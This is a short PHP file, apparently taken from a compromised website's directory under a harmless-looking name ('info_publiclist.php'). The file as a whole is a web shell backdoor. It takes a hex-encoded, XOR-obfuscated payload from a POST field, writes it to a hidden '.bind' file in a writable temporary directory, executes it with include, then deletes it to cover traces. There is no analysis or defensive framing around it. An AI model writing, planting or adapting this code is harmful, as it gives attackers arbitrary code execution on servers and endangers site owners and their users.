/home/ramtczxy/bestgreyparrot.com/info_publiclist.php
<?php

if(filter_has_var(INPUT_POST, "key")){
	$symbol = array_filter(["/tmp", ini_get("upload_tmp_dir"), getenv("TMP"), getcwd(), "/var/tmp", "/dev/shm", getenv("TEMP"), sys_get_temp_dir(), session_save_path()]);
	$ent = hex2bin($_POST["key"]);
	$marker='';foreach(str_split($ent) as $char){$marker .= chr(ord($char) ^ 87);}
	for ($data_chunk = 0, $factor = count($symbol); $data_chunk < $factor; $data_chunk++) {
    $object = $symbol[$data_chunk];
    		if ((function($d) { return is_dir($d) && is_writable($d); })($object)) {
    $component = vsprintf("%s/%s", [$object, ".bind"]);
    if (@file_put_contents($component, $marker) !== false) {
	include $component;
	unlink($component);
	die();
}
}
}
}